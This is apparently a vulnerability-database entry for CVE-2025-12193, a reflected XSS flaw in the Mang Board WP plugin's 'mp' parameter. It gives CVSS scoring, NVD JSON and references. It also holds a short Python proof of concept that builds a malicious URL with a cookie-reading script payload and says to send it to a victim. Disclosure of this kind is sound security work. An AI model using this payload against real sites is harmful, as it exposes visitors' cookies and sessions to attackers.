Security Vulnerability Report
中文
CVE-2025-12193 CVSS 6.1 MEDIUM

CVE-2025-12193

Published: 2025-11-08 04:15:45
Last Modified: 2026-04-15 00:35:42

Description

The Mang Board WP plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'mp' parameter in all versions up to, and including, 2.3.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.

CVSS Details

CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Mang Board WP plugin <= 2.3.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests from urllib.parse import quote # CVE-2025-12193 PoC - Reflected XSS in Mang Board WP plugin # Target: WordPress site with Mang Board plugin <= 2.3.1 # Parameter: mp target_url = input("Enter target URL (e.g., http://example.com): ").rstrip('/') # Malicious JavaScript payload for XSS xss_payload = "<script>alert(document.cookie)</script>" encoded_payload = quote(xss_payload) # Construct the malicious URL with the vulnerable 'mp' parameter malicious_url = f"{target_url}/?mp={encoded_payload}" print(f"[*] Target: {target_url}") print(f"[*] Malicious URL: {malicious_url}") print(f"[*] Payload: {xss_payload}") print("\n[+] Send this URL to the victim to trigger the XSS") print("[+] When victim clicks the link, the JavaScript will execute in their browser") # Optional: Test if the parameter is reflected without encoding test_url = f"{target_url}/?mp=test" response = requests.get(test_url) if 'mp' in response.text and 'test' in response.text: print(f"\n[!] Parameter 'mp' is reflected in the response") print("[!] Site may be vulnerable to XSS") else: print("\n[-] Parameter 'mp' not found in response or properly encoded")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-12193", "sourceIdentifier": "[email protected]", "published": "2025-11-08T04:15:45.223", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Mang Board WP plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'mp' parameter in all versions up to, and including, 2.3.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3388547%40mangboard&new=3388547%40mangboard&sfp_email=&sfph_mail=", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/8604f1d2-7300-4163-828b-ca17ba53f613?source=cve", "source": "[email protected]"}]}}